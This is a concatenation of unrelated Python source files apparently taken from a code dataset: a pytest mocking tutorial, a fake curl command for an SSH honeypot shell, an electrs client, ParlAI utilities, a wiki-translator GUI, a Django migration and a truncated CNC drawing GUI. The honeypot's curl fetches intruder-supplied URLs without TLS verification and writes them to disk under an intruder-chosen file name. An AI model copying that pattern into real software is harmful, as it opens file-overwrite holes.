    # NOTE(review): get_event_loop()/run_until_complete is the legacy pattern;
    # asyncio.run(main()) is the modern equivalent on Python 3.7+.
    loop = asyncio.get_event_loop()
    loop.run_until_complete(main())
| StarcoderdataPython |
3323688 | <reponame>GordonSo/pyMock-examples
from unittest import mock
import pytest_mock
"""
This tutorial contains a number of test function to demonstrate different ways to mock a function
Each of this function can be run or debug individually and have the following setup:
- class A with has a function do_something that will to return a given value as-is
Every test will calls the function with an input value 1
and will mock the function to get the result to return an hijack value of 2
"""
# Here is our demo setup
class A:
def do_something(self, _input_value):
return {"value": _input_value}
input_value = 1
hijack_value = 2
# Let start with running the test end-to-end without mock
def test_without_mock():
# Given we will create an instance
a = A()
# When we call the instance to do something with value X
result = a.do_something(input_value)
# Then the result should be value X
assert result["value"] == input_value
# 1) To mock a function (by forcing your way through)
# Let's hijack the do_something function inside the A class object
def test_hijack_a_function():
# class an instance
a = A()
# We can re-assign the do_something attribute to a 'MagicMock' object with a return value
# NB: mock.MagicMock is from unittest which comes with built-in python
mock_a = mock.MagicMock(return_value={"value": hijack_value})
a.do_something = mock_a
# do something with value X
result = a.do_something(input_value)
# Then we can see that mock_a has been called once
mock_a.assert_called_once_with(input_value)
# the result should be overridden to whatever was hijacked to be return
assert result["value"] == hijack_value
# 2) How to mock a function with a context manager
def test_mock_function_return():
# Instead of displacing the function, we can patch the object and save the reference for us to assert on later
with mock.patch.object(A, "do_something", return_value={"value": hijack_value}) as mock_a:
a = A()
result = a.do_something(input_value)
# Then we can see that mock_a has been called once
mock_a.assert_called_once_with(input_value)
# And assert that the value has been overridden
assert result["value"] == hijack_value
# When we then call the function again outside the context
result2 = a.do_something(input_value)
# And assert that the value has been restored to normal
assert result2["value"] == input_value
# 3) How to mock a function with a context manager
@mock.patch.object(A, "do_something", lambda a,b:{"value": hijack_value})
def test_mock_function_return():
a = A()
result = a.do_something(input_value)
# And assert that the value has been overridden
assert result["value"] == hijack_value
# 3) Using pytest mock
# Inject a mocker fixture into the test
# NB: mocker is a unchangeable magical keyword recognised by pytest_mock
def test_pytest_mock_function_return(mocker: pytest_mock.MockFixture):
    """Same patch via the pytest-mock `mocker` fixture; cleanup is automatic."""
    # Patch by dotted path — the target is named where it is defined/used.
    patched = mocker.patch("lesson01_mocks.test_function_mock.A.do_something")
    patched.return_value = {"value": hijack_value}
    instance = A()
    outcome = instance.do_something(input_value)
    # One call with our input, result overridden by the mock.
    patched.assert_called_once_with(input_value)
    assert outcome["value"] == hijack_value
# We can further improve the command with the return value inline
def test_pytest_mock_function_return_improver(mocker: pytest_mock.MockFixture):
    """Identical to the previous test, with the return value configured inline."""
    patched = mocker.patch(
        "lesson01_mocks.test_function_mock.A.do_something",
        return_value={"value": hijack_value},
    )
    outcome = A().do_something(input_value)
    patched.assert_called_once_with(input_value)
    assert outcome["value"] == hijack_value
| StarcoderdataPython |
165367 | <reponame>palwolus/Cyder<gh_stars>1-10
from vfssh.vfs.Command import Command
from vfssh.vfs.error import VFSError
from vfssh.vfs.fs_object import FileObject
import requests
class curl(Command):
    """Fake `curl` for the virtual shell: downloads a URL into the VFS.

    Supports `-o <name>` (explicit output name) and `-O` (derive name from URL).
    """

    def __init__(self, vfs=None):
        super().__init__('curl')
        self.set_vfs(vfs)

    def process(self, **kwargs):
        """Parse the command line, download the target and register it in the VFS."""
        full, cmd, = kwargs['full'], kwargs['cmd']
        args = full[5:].split(' ')  # strip the leading "curl "
        no_need_arg, require_arg = ['-O'], ['-o']
        skip, url, fmt_args = False, '', []
        for i in range(0, len(args)):
            if skip:
                # this token was already consumed as the previous option's parameter
                skip = False
                continue
            if args[i] in require_arg:
                try:
                    fmt_args.append([args[i], args[i + 1]])
                except IndexError:
                    # option given as the last token, with no parameter
                    fmt_args.append([args[i]])
                skip = True
            elif args[i] in no_need_arg:
                fmt_args.append([args[i]])
            else:
                url = args[i]
        # Reject options that require a parameter but did not get one.
        for i in fmt_args:
            if any(elem in require_arg for elem in i):
                if len(i) == 1:
                    self.write('curl: option {}: requires parameter\n'.format(i[0]))
                    return
        if len(url) == 0:
            self.write('curl: no URL specified!\n')
            return
        if url.startswith('/'):
            self.write('curl: Remote file name has no length!\n')
            return
        # -------------------------------------------------------------------------------------------------------------
        # End of Conditions
        # -------------------------------------------------------------------------------------------------------------
        # TODO: VFS, HASH, Accepted
        # BUG FIX: the original test (`'http://' not in url or 'https://' not in url`)
        # was true for https URLs too, producing "http://https://...".
        if not url.startswith(('http://', 'https://')):
            url = 'http://' + url
        try:
            # honour "-o <name>", otherwise name the file after the URL's last segment
            opt = [i for i in fmt_args if '-o' in i][0]
            file_name = opt[1]
        except IndexError:
            file_name = url.split('/')[-1]
        try:
            self.download(url, file_name)
        except requests.exceptions.ConnectionError:
            # TODO: emulate curl's progress/error output here instead of this stub
            print('z')
            return
        except IsADirectoryError:
            self.write('Warning: Failed to create the file dd: Is a directory\n')
            self.write('curl: (23) Failed writing received data to disk/application\n')
            return
        # Register the downloaded file in the virtual filesystem.
        head = self.vfs.head
        obj = FileObject(file_name, 'rwxrwxrwwx', head.loc + file_name)
        head.add_obj(obj)
        return None

    @staticmethod
    def download(url, file_name):
        """Fetch *url* and write the body to *file_name*.

        The request runs before the file is opened, so a failed download no
        longer leaves an empty file behind.
        """
        response = requests.get(url, verify=False, timeout=2)
        with open(file_name, 'wb') as file:
            file.write(response.content)
| StarcoderdataPython |
4813233 | <gh_stars>1-10
import json
import socket
from hashlib import sha256
import time
from bitcoin.wallet import CBitcoinAddress
import bitcoin
import binascii
from typing import Dict, List
from config import Config, NETWORK_TESTNET, NETWORK_MAINNET
import logging
def _request(method, *args):
return {'method': method, 'params': list(args)}
def _to_scripthash(bitcoin_address: "CBitcoinAddress") -> str:
    """Return the Electrum script hash for an address as a hex string.

    That is: sha256 of the scriptPubKey, byte-reversed, hex-encoded.
    """
    digest = sha256(bitcoin_address.to_scriptPubKey()).digest()
    return binascii.hexlify(digest[::-1]).decode("ascii")
class ElectrsClient:
    """Minimal Electrum-protocol JSON-RPC client over a raw TCP socket.

    Speaks newline-delimited JSON (one request/response per line), as served
    by electrs.
    """

    def __init__(self, addr):
        self.s = socket.create_connection(addr)
        self.f = self.s.makefile('r')
        self.id = 0
        # Negotiate the protocol version up front.
        version_response = self._call(_request("server.version", "", "1.4"))
        assert version_response.get(
            "error") is None, "Failed to negotiate version"

    def close(self):
        """Release the socket and its file wrapper."""
        self.f.close()
        self.s.close()

    def _call(self, request):
        """Send one JSON-RPC request and return the decoded response dict."""
        request['id'] = self.id
        request['jsonrpc'] = '2.0'
        self.id += 1
        msg = json.dumps(request) + '\n'
        self.s.sendall(msg.encode('ascii'))
        response = json.loads(self.f.readline())
        return response

    def _batch_call(self, requests):
        """Send a JSON-RPC batch; the responses come back on one line, in order."""
        for request in requests:
            request['id'] = self.id
            request['jsonrpc'] = '2.0'
            self.id += 1
        msg = json.dumps(requests) + '\n'
        self.s.sendall(msg.encode('ascii'))
        responses = json.loads(self.f.readline())
        return responses

    def get_transactions(self, txids: List[str]):
        """
        @return: List of transactions in JSON in the same order as the input.
        """
        requests = [_request("blockchain.transaction.get",
                             txid, True) for txid in txids]
        responses = self._batch_call(requests)
        txs = []
        for i, response in enumerate(responses):
            # BUG FIX: was `response.get['error']` (subscripting a bound
            # method), which raised TypeError instead of showing the error.
            assert response.get("error") is None, "error: {}".format(
                response["error"])
            # Requests order must matches the reponses order
            assert response["result"]["txid"] == txids[i]
            txs.append(response["result"])
        return txs

    def existaddress(self, bitcoin_address: CBitcoinAddress) -> bool:
        """Return True if the address has any confirmed or mempool history."""
        response = self._call(_request("blockchain.scripthash.get_history",
                                       _to_scripthash(bitcoin_address)))
        # BUG FIX: was `response.get['error']` (see get_transactions).
        assert response.get('error') is None, "error: {}".format(
            response['error'])
        return len(response['result']) > 0

    def get_history(self, bitcoin_address: CBitcoinAddress) -> List[str]:
        """
        @return: A list of txid of confirmed transaction in blockchain order (e.g 2094994, 2094998, ... ).
                 txid is in hex string e.g "68278fbf26dfb5e280ba298cf621775c6a20fbf5606dd6ce9443d314950cb2f7" for testnet.
        """
        response = self._call(_request("blockchain.scripthash.get_history",
                                       _to_scripthash(bitcoin_address)))
        txids = []
        for r in response['result']:
            # height > 0 means the transaction is confirmed in a block
            if r["height"] > 0:
                txids.append(r["tx_hash"])
        return txids

    def get_mempool(self, bitcoin_address: CBitcoinAddress) -> List[str]:
        """
        @return: A list of txid of transaction in mempool.
        """
        response = self._call(_request("blockchain.scripthash.get_history",
                                       _to_scripthash(bitcoin_address)))
        txids = []
        for r in response['result']:
            # height == 0 marks unconfirmed (mempool) entries
            if r["height"] == 0:
                txids.append(r["tx_hash"])
        return txids

    def fee_estimates(self):
        """
        Get an object where the key is the confirmation target (in number of blocks) and the value is the estimated feerate (in sat/vB).
        The available confirmation targets are 1-25, 144, 504 and 1008 blocks.
        @return: exmaple { "1": 87.882, "6": 20.0, "144": 1.027 }
        """
        n_blocks_list = [1, 6, 144]
        requests = [_request("blockchain.estimatefee", n_blocks)
                    for n_blocks in n_blocks_list]
        responses = self._batch_call(requests)
        feerates = {}
        for i in range(len(responses)):
            # server returns BTC/kB; *100000 converts to sat/vB
            feerates[str(n_blocks_list[i])] = responses[i]["result"]*100000
        return feerates

    def get_rawtransaction(self, txid: str) -> str:
        """
        @txid: The transaction hash as a hexadecimal string.
        @return: tx in hexadecimal string.
        """
        response = self._call(_request("blockchain.transaction.get", txid, False))
        # BUG FIX: was `response.get['error']` (see get_transactions).
        assert response.get('error') is None, "error: {}".format(
            response['error'])
        return response["result"]
def creact_electrs_client() -> "ElectrsClient":
    """Build an ElectrsClient for the configured network.

    Caller owns the returned object and should close() it when done.
    """
    assert Config.TestNetElectrsHostAndPort
    host_and_port = (
        Config.TestNetElectrsHostAndPort
        if Config.Network == NETWORK_TESTNET
        else Config.ElectrsHostAndPort
    )
    return ElectrsClient(host_and_port)
| StarcoderdataPython |
1622082 | <reponame>mohan-chinnappan-n/ParlAI
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
File for miscellaneous utility functions and constants.
"""
# some of the utility methods are helpful for Torch
try:
import torch
__TORCH_AVAILABLE = True
except ImportError:
__TORCH_AVAILABLE = False
"""Near infinity, useful as a large penalty for scoring when inf is bad."""
NEAR_INF = 1e20
def set_namedtuple_defaults(namedtuple, default=None):
    """
    Set *all* of the fields for a given nametuple to a singular value.

    Modifies the tuple in place, but returns it anyway.

    More info: https://stackoverflow.com/a/18348004

    :param namedtuple: A constructed collections.namedtuple
    :param default: The default value to set.

    :returns: the modified namedtuple
    """
    n_fields = len(namedtuple._fields)
    namedtuple.__new__.__defaults__ = tuple(default for _ in range(n_fields))
    return namedtuple
def padded_tensor(items, pad_idx=0, use_cuda=False, left_padded=False, max_len=None):
    """
    Create a padded matrix from an uneven list of lists.

    Returns (padded, lengths), where padded is the padded matrix, and lengths
    is a list containing the lengths of each row.

    Matrix is right-padded (filled to the right) by default, but can be
    left padded if the flag is set to True.

    Matrix can also be placed on cuda automatically.

    :param list[iter[int]] items: List of items
    :param int pad_idx: the value to use for padding
    :param bool use_cuda: if true, places `padded` on GPU
    :param bool left_padded: if true, pad at the beginning instead of the end
    :param int max_len: if None, the max length is the maximum item length

    :returns: (padded, lengths) tuple
    :rtype: (Tensor[int64], list[int])
    """
    # NOTE: the original docstring documented a nonexistent `sort` parameter;
    # it has been removed and `left_padded` documented instead.
    # hard fail if we don't have torch
    if not __TORCH_AVAILABLE:
        raise ImportError(
            "Cannot use padded_tensor without torch; go to http://pytorch.org"
        )
    # number of items
    n = len(items)
    # length of each item
    lens = [len(item) for item in items]
    # max in time dimension
    t = max(lens) if max_len is None else max_len
    # if input tensors are empty, we should expand to nulls
    t = max(t, 1)
    if isinstance(items[0], torch.Tensor):
        # keep type of input tensors, they may already be cuda ones
        output = items[0].new(n, t)
    else:
        output = torch.LongTensor(n, t)
    output.fill_(pad_idx)
    for i, (item, length) in enumerate(zip(items, lens)):
        if length == 0:
            # skip empty items
            continue
        if not isinstance(item, torch.Tensor):
            # put non-tensors into a tensor
            item = torch.LongTensor(item)
        if left_padded:
            # place at end
            output[i, t - length :] = item
        else:
            # place at beginning
            output[i, :length] = item
    if use_cuda:
        output = output.cuda()
    return output, lens
def argsort(keys, *lists, descending=False):
    """
    Reorder each list in lists by the (descending) sorted order of keys.

    :param iter keys: Keys to order by.
    :param list[list] lists: Lists to reordered by keys's order.
                             Correctly handles lists and 1-D tensors.
    :param bool descending: Use descending order if true.

    :returns: The reordered items.
    """
    order = sorted(range(len(keys)), key=keys.__getitem__)
    if descending:
        order = order[::-1]
    reordered = []
    for seq in lists:
        # watch out in case we don't have torch installed
        if __TORCH_AVAILABLE and isinstance(seq, torch.Tensor):
            reordered.append(seq[order])
        else:
            reordered.append([seq[i] for i in order])
    return reordered
| StarcoderdataPython |
1610850 | import json
import tkinter as tk
from tkinter import ttk
import api
import core
CONFIG = 'config.json'
AUTOSAVE = 'autosave.txt'
TF2_WIKI_API = 'https://wiki.teamfortress.com/w/api.php'
WIKIPEDIA_API = 'https://en.wikipedia.org/w/api.php'
def open_config():
    """Load the configuration dict from CONFIG, creating it with the defaults
    first when the file does not exist yet.

    Replaces the original probe-open/close check (LBYL) with straight EAFP.
    """
    try:
        with open(CONFIG, 'r') as file:
            return json.load(file)
    except FileNotFoundError:
        recreate_config()
        with open(CONFIG, 'r') as file:
            return json.load(file)
def recreate_config():
    """Overwrite CONFIG with the standard default settings."""
    with open(CONFIG, 'w') as config_file:
        json.dump(core.STANDARD_CONFIG, config_file, indent=4)
def save_config(key, value):
    """Update one setting and persist the whole config back to disk."""
    settings = open_config()
    settings[key] = value
    with open(CONFIG, 'w') as config_file:
        json.dump(settings, config_file, indent=4)
class ControlPanel(ttk.Frame):
    """Top bar holding the language selector and the TF-Wiki API checkbox.

    Every change is written to the config file and immediately re-triggers
    translation through *translate_callback*.
    """

    def __init__(self, parent, translate_callback, **kwargs):
        ttk.Frame.__init__(self, parent, **kwargs)
        self.translate_callback = translate_callback
        # restore the last-used values from the persisted config
        language = open_config()['language']
        api_access = open_config()['api_access']
        self.language_label = ttk.Label(self, text='Language: ')
        self.language = ttk.Combobox(
            self,
            width=7,
            state='readonly',
            values=list(core.LANGUAGES.keys())
        )
        self.language.set(language)
        # selecting a language persists it and retranslates
        self.language.bind(
            '<<ComboboxSelected>>',
            lambda _: self.updated('language', self.language.get())
        )
        self.var_api = tk.IntVar()
        self.api = ttk.Checkbutton(
            self, text='Use TF Wiki connection to improve translations',
            variable=self.var_api,
            command=lambda: self.updated('api_access', self.var_api.get())
        )
        self.var_api.set(api_access)
        self.language_label.grid(column=0, row=0, sticky='nwes')
        self.language.grid(column=1, row=0, sticky='nwes', padx=(0, 15))
        self.api.grid(column=2, row=0, sticky='nwes')

    def updated(self, key, value):
        # persist the new setting, then re-run translation with it
        save_config(key, value)
        self.translate_callback()
class GUI(tk.Tk):
    """Main window: input text pane, read-only output pane and control panel.

    The input pane is polled once per second; whenever its content changed,
    the whole text is retranslated and shown in the output pane.
    """

    def __init__(self):
        # translation backend shared by the whole window
        self.context = core.Context(
            tf2_api=api.API(TF2_WIKI_API),
            wikipedia_api=api.API(WIKIPEDIA_API)
        )
        self.last_input = ''
        super().__init__()
        self.title('wikitranslator')
        # intercept window close so the output can be autosaved first
        self.protocol('WM_DELETE_WINDOW', self.exit)
        self.frame = ttk.Frame(self, padding='3 3 3 3', style='Wat.TFrame')
        self.text_input = tk.Text(
            self.frame,
            width=90, height=40,
            wrap='char',
            undo=True, maxundo=100
        )
        self.scrollbar_input = ttk.Scrollbar(
            self.frame, orient='vertical', command=self.text_input.yview
        )
        self.text_output = tk.Text(
            self.frame,
            width=90, height=40,
            wrap='char',
            state=tk.DISABLED
        )
        self.scrollbar_output = ttk.Scrollbar(
            self.frame, orient='vertical', command=self.text_output.yview
        )
        self.control_panel = ControlPanel(
            self.frame, self.translate, padding='3 3 3 3'
        )
        self.frame.grid(column=0, row=0, sticky='nwes')
        self.control_panel.grid(column=0, row=0, sticky='nwes')
        self.text_input.grid(column=0, row=1, sticky='nwes')
        self.scrollbar_input.grid(column=1, row=1, sticky='nwes')
        self.text_output.grid(column=2, row=1, sticky='nwes')
        self.scrollbar_output.grid(column=3, row=1, sticky='nwes')
        self.text_input['yscrollcommand'] = self.scrollbar_input.set
        self.text_output['yscrollcommand'] = self.scrollbar_output.set
        self.columnconfigure(0, weight=1)
        self.rowconfigure(0, weight=1)
        self.frame.rowconfigure(1, weight=1, minsize=150)
        self.frame.columnconfigure(0, weight=2, minsize=400)
        self.frame.columnconfigure(2, weight=2, minsize=400)
        self.bind('<Control-Z>', self.text_input.edit_undo)
        self.bind('<Control-Shift-Z>', self.text_input.edit_redo)
        # start the 1 s polling loop that watches the input pane
        self.after(1000, self.input_tick)

    def exit(self):
        """Autosave any translated output, then tear the window down."""
        if self.text_output.get('1.0', 'end') != '':
            self.save_file()
        self.destroy()
        self.quit()

    def input_tick(self):
        """Poll the input pane once per second and retranslate on change."""
        current_input = self.text_input.get('1.0', 'end').strip()
        if current_input != self.last_input:
            self.last_input = current_input
            self.translate()
        self.after(1000, self.input_tick)

    def save_file(self):
        # append in binary/utf-8 so earlier autosaves are never overwritten
        with open(AUTOSAVE, 'ab') as file:
            file.write(bytes(self.text_output.get('1.0', 'end'), 'utf-8'))

    def translate(self):
        """Translate last_input with the current panel settings into the output pane."""
        translated = self.context.translate(
            self.control_panel.language.get(),
            self.control_panel.var_api.get(),
            self.last_input
        )
        # the output widget is normally disabled; enable just for the update
        self.text_output.configure(state=tk.NORMAL)
        self.text_output.delete('1.0', 'end')
        self.text_output.insert('1.0', '\n\n'.join(translated))
        self.text_output.configure(state=tk.DISABLED)
if __name__ == '__main__':
    # Launch the translator window and enter the Tk event loop.
    app = GUI()
    app.mainloop()
| StarcoderdataPython |
3212210 | # Generated by Django 2.2.1 on 2019-08-31 10:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("core", "0009_activeplugin_enabled")]
operations = [
migrations.RemoveField(model_name="report", name="config"),
migrations.AddField(
model_name="report",
name="theme_config",
field=models.TextField(
blank=True, null=True, verbose_name="Theme config JSON"
),
),
migrations.AddField(
model_name="report",
name="theme_slug",
field=models.CharField(
default="", max_length=200, verbose_name="Theme slug"
),
preserve_default=False,
),
]
| StarcoderdataPython |
3370733 | #!/usr/bin/env python
"CNC GUI basic page switching"
import sys
import os
import pygame
import pigpio
import socket
import linecache
from pygame import *
from pygame.transform import scale
from pygame.locals import *
import math
pygame.warn_unwanted_files
main_dir = os.path.dirname(os.path.abspath("__file__"))
# R G B
WHITE = (255, 255, 255)
DARKGRAY = (150, 150, 150)
BLACK = ( 0, 0, 0)
RED = (255, 0, 0)
GREEN = ( 0, 255, 0)
BLUE = ( 0, 0, 255)
YELLOW = (255, 255, 0)
ORANGE = (255, 128, 0)
PURPLE = (255, 0, 255)
ABLUE = ( 50, 50, 100)
COLOR_ON = (100, 100, 200)
COLOR_OFF= (255, 255, 255)
dstx = 0
dsty = 0
dscale= 1
def main():
    """Initialise pygame, load the part geometry and enter the home screen.

    NOTE: this module is Python 2 (print statements below).
    """
    init()  # from `from pygame import *` -- pygame.init
    global DISPLAYSURF, FPSCLOCK, WINDOWWIDTH, WINDOWHEIGHT, XINV, YINV
    global Font
    global FDMAR
    global dstx,dsty,dscale
    # fit the step file into a 590x540 viewport and pre-quantise it
    dstx,dsty,dscale=getscale(590,540)
    get_stpz(dstx,dsty,dscale)
    #global gsetting[5]
    Font = font.Font(None, 34)
    # if image_file is None:
    image_file = os.path.join(main_dir, 'data', 'home.png')
    margin = 80
    view_size = (500, 500)
    zoom_view_size = (500, 500)
    win_size = (800, 600)
    background_color = Color('beige')
    WINDOWWIDTH, WINDOWHEIGHT = 800, 600
    #XINV, YINV = True, True #@TODO
    XINV, YINV = False, False #@TODO
    FDMAR = False
    pygame.init()
    FPSCLOCK = pygame.time.Clock()
    #DISPLAYSURF = pygame.display.set_mode((WINDOWWIDTH,WINDOWHEIGHT),pygame.FULLSCREEN, 32)
    DISPLAYSURF = pygame.display.set_mode((WINDOWWIDTH,WINDOWHEIGHT))
    # set up key repeating so we can hold down the key to scroll.
    #old_k_delay, old_k_interval = pygame.key.get_repeat ()
    #pygame.key.set_repeat (500, 30)
    try:
        #screen = pygame.display.set_mode(win_size,pygame.FULLSCREEN)
        screen = pygame.display.set_mode(win_size)
        screen.fill(background_color)
        pygame.display.flip()
        image = pygame.image.load(image_file).convert()
        image_w, image_h = image.get_size()
        # sanity check that the background image covers the view area
        if image_w < view_size[0] or image_h < view_size[1]:
            print ("The source image is too small for this example.")
            print ("A %i by %i or larger image is required." % zoom_view_size)
            return
        regions = pygame.Surface(win_size, 0, 24)
        pygame.display.flip()
        #screen.set_clip((margin, margin, zoom_view_size[0], zoom_view_size[1]))
        view_rect = Rect(0, 0, view_size[0], view_size[1])
        #scale(image.subsurface(view_rect), zoom_view_size,
        #     screen.subsurface(screen.get_clip()))
        #pygame.display.flip()
        #pygame.mouse.set_visible(False) #@TODO
        # hand control to the home screen's event loop
        screenHome()
        # the direction we will scroll in.
        direction = None
        clock = pygame.time.Clock()
        clock.tick()
        going = True
    finally:
        #pygame.key.set_repeat (old_k_delay, old_k_interval)
        print 'GOOD BYE'
def showtext(win, pos, text, color, bgcolor):
    """Render *text* at *pos* on surface *win* using the global Font.

    A bgcolor of 'NO' means transparent background. Returns (x just past the
    rendered text plus 5 px, original y).
    """
    if bgcolor == 'NO':
        rendered = Font.render(text, 1, color)
    else:
        rendered = Font.render(text, 1, color, bgcolor)
    win.blit(rendered, pos)
    return pos[0] + rendered.get_width() + 5, pos[1]
def showtextr(win, pos, angle, text, color, bgcolor):
    """Like showtext(), but the rendered text is rotated by *angle* degrees.

    The returned width is measured AFTER rotation.
    """
    if bgcolor == 'NO':
        rendered = Font.render(text, 1, color)
    else:
        rendered = Font.render(text, 1, color, bgcolor)
    rendered = pygame.transform.rotate(rendered, angle)
    win.blit(rendered, pos)
    return pos[0] + rendered.get_width() + 5, pos[1]
def getset():
    """Read the persisted settings from setting.txt (one value per line).

    Slots not present in the file keep their defaults; each line's trailing
    newline is stripped. At most five lines are expected.
    """
    values = ["12", "4", "3", "2", "0"]
    with open("setting.txt", "r") as fh:
        for idx, line in enumerate(fh):
            values[idx] = line[:-1]
    return values
def getshset(setfile):
    """Read shape settings from *setfile*, one value per line.

    Values fill slots 1..n; slot 0 is set to str(line_count + 1). Unfilled
    slots keep their defaults.
    """
    values = ["12", "4", "3", "2", "0"]
    idx = 1
    with open(setfile, "r") as fh:
        for line in fh:
            values[idx] = line[:-1]
            idx += 1
    values[0] = str(idx)
    return values
def filelines(x, y, nfile, line_off, line_count, line_length, line_selected):
    """Render a scrolled window of *nfile* onto DISPLAYSURF starting at (x, y).

    Shows up to line_count lines after skipping line_off, each truncated to
    line_length characters; the row at offset line_selected is drawn
    highlighted (white on blue). Returns the highlighted line's text, or
    ' ' when no row was highlighted.
    """
    fo = open(nfile, "r")
    i=y
    lines=1
    liner=' '
    for line in fo:
        # truncate to the visible column width
        line=line[0:(line_length+1)]
        if (lines > line_off) and (lines< (line_off + line_count + 1)) :
            if (lines == line_selected + line_off):
                # selected row: inverted colours, remember its text
                showtextr(DISPLAYSURF, (x,i),0,line[:-1], COLOR_OFF, ABLUE)
                liner=line[:-1]
            else:
                showtextr(DISPLAYSURF, (x,i),0,line[:-1], COLOR_OFF,'NO')
            i=i+25  # 25 px per text row
        lines+=1
    fo.close()
    return liner
def wline(nfile, line_str):
    """Append *line_str* to the file *nfile*."""
    with open(nfile, "a") as out:
        out.write(line_str)
def printset(s):
    """Persist settings *s* to setting.txt and regenerate the gconfig1.h header.

    BUG FIX: the original opened both files and never closed them; `with`
    blocks now guarantee the handles are flushed and released.
    """
    # one raw setting value per line
    with open("setting.txt", "w+") as fo:
        for i in range(len(s)):
            fo.write(s[i]+'\n')
    # regenerate the C header; s[2]/s[3] feed the X/Y speed differentials
    with open("gconfig1.h", "w+") as gcon:
        gcon.write("/*\n* gconfig.h\n* Created by: Adros Systems\n* Author: sdagar\n*/\n")
        gcon.write("#ifndef GCONFIG_H_\n")
        gcon.write("#define GCONFIG_H_\n")
        gcon.write("#define FINE 100\n")
        gcon.write("#define SPEED_R 12\n")
        gcon.write("#define SPEED_N 6\n")
        gcon.write("#define SPEED_DIF_X "+str(float(s[2])/10)+"\n")
        gcon.write("#define SPEED_DIF_Y "+str(float(s[3])/10)+"\n")
        gcon.write("#define SX 1\n")
        gcon.write("#define SY 1\n")
        gcon.write("#define KX 5\n")
        gcon.write("#define KY 5\n")
        gcon.write("#define NX (SPEED_R*(KX+1)/(2*SPEED_DIF_X))+1\n")
        gcon.write("#define NY (SPEED_R*(KX+1)/(2*SPEED_DIF_X))+1\n")
        gcon.write("#define FL (int)(NX>NY?NX:NY)\n")
        gcon.write("#define MAXT 5\n")
        gcon.write("#endif")
def getscale(L,H):
    """Fit the path in motion/step1.txt into an L x H pixel viewport.

    Walks the step file (one direction code 1-8 per line) to find the path's
    bounding box, then returns [stx, sty, scale]: the pixel offset of the
    origin inside the viewport and the uniform scale factor (capped at 0.756).
    """
    #Generating Scale and starting point for gcode
    L=float(L)
    H=float(H)
    stp_file=os.path.join(main_dir, 'motion' ,'step1.txt')
    g = open(stp_file, "r")
    sx=1.176  # per-step x advance (x/y aspect correction) -- assumed machine ratio; TODO confirm
    sy=1
    x=0
    y=0
    xMx=1.0
    xMn=-1.0
    yMx=1.0
    yMn=-1.0
    # replay every step to accumulate the bounding box
    for line in g:
        if (line=='3\n'):
            y=y+sy
        elif (line=='4\n'):
            x=x-sx
            y=y+sy
        elif (line=='7\n'):
            y=y-sy
        elif (line=='8\n'):
            x=x+sx
            y=y-sy
        elif (line=='1\n'):
            x=x+sx
        elif (line=='2\n'):
            x=x+sx
            y=y+sy
        elif (line=='5\n'):
            x=x-sx
        elif (line=='6\n'):
            x=x-sx
            y=y-sy
        #pygame.draw.line(DISPLAYSURF,BLACK,(xb,yb),(x,y),2)
        if (x>xMx):
            xMx=x
        if (x<xMn):
            xMn=x
        if (y>yMx):
            yMx=y
        if (y<yMn):
            yMn=y
    # pick the limiting axis so the whole path fits
    scx = L/(xMx-xMn)
    scy = H/(yMx-yMn)
    scale = scx
    if (scx>scy):
        scale = scy
    if (scale>0.756):
        scale = 0.756  # never magnify small parts beyond this factor
    stx = int(-xMn*L/(xMx-xMn))
    sty = int(-yMn*H/(yMx-yMn))
    g.close()
    return [stx,sty,scale]
def gdraw(stx,sty,scale,col):
    """Draw the path from motion/step1.txt onto DISPLAYSURF.

    stx/sty position the path, scale sizes it; segments drawn while the
    torch is on (codes '9'/'0' toggle it) use *col*, off-moves use DARKGRAY.
    """
    #Draw Gcode on screen
    #sc=getscale(590,540)
    sclx=1.176
    scly=1
    xoff=10.0;
    yoff=550.0;   # screen y grows downward, so y is inverted below
    togg=False;   # torch state
    #print (sc[0],sc[1],sc[2])
    stp_file=os.path.join(main_dir, 'motion' ,'step1.txt')
    g = open(stp_file, "r")
    sx=scale*sclx
    sy=scale*scly
    x=stx+xoff
    y=yoff-sty
    xb=stx+xoff
    yb=yoff-sty
    for line in g:
        if (line=='3\n'):
            y=y-sy
        elif (line=='4\n'):
            x=x-sx
            y=y-sy
        elif (line=='7\n'):
            y=y+sy
        elif (line=='8\n'):
            x=x+sx
            y=y+sy
        elif (line=='1\n'):
            x=x+sx
        elif (line=='2\n'):
            x=x+sx
            y=y-sy
        elif (line=='5\n'):
            x=x-sx
        elif (line=='6\n'):
            x=x-sx
            y=y+sy
        elif (line=='9\n'):
            togg=True
        elif (line=='0\n'):
            togg=False
        if (togg==True):
            colo = col
        else:
            colo = DARKGRAY
        # only draw when the position moved by at least one whole pixel
        if not ((int(xb)==int(x)) and (int(yb)==int(y))):
            pygame.draw.line(DISPLAYSURF,colo,(int(xb),int(yb)),(int(x),int(y)),3)
        xb=x
        yb=y
    pygame.display.update()
    g.close()
def get_stpz(stx,sty,scale):
    """Re-quantise the scaled path into whole-pixel steps: motion/stepz.txt.

    Replays motion/step1.txt at the given scale and, whenever the integer
    pixel position changes, emits one "<dir> <n>" line, where n is the index
    of the source step that produced it. Torch codes pass through as
    "9 0" / "0 0".
    """
    #Draw Gcode on screen
    #sc=getscale(590,540)
    sclx=1.176
    scly=1
    xoff=10.0;
    yoff=550.0;
    togg=False;
    count=0;   # index of the current source step
    #print (sc[0],sc[1],sc[2])
    stp_file=os.path.join(main_dir, 'motion' ,'step1.txt')
    stz_file=os.path.join(main_dir, 'motion' ,'stepz.txt')
    g = open(stp_file, "r")
    gz = open(stz_file, "w")
    sx=scale*sclx
    sy=scale*scly
    x=stx+xoff
    y=yoff-sty
    xb=stx+xoff
    yb=yoff-sty
    print "sx = "+str(sx)+"sy =" + str(sy)
    for line in g:
        if (line=='3\n'):
            y=y-sy
        elif (line=='4\n'):
            x=x-sx
            y=y-sy
        elif (line=='7\n'):
            y=y+sy
        elif (line=='8\n'):
            x=x+sx
            y=y+sy
        elif (line=='1\n'):
            x=x+sx
        elif (line=='2\n'):
            x=x+sx
            y=y-sy
        elif (line=='5\n'):
            x=x-sx
        elif (line=='6\n'):
            x=x-sx
            y=y+sy
        elif (line=='9\n'):
            gz.write('9 0\n')
        elif (line=='0\n'):
            gz.write('0 0\n')
        # compare previous vs current integer pixel; emit the matching
        # direction code when the position crossed a pixel boundary
        if ((int(xb)==(int(x)+1)) and (int(yb)==(int(y)))):
            gz.write('1 ')
            gz.write(str(count))
            gz.write('\n')
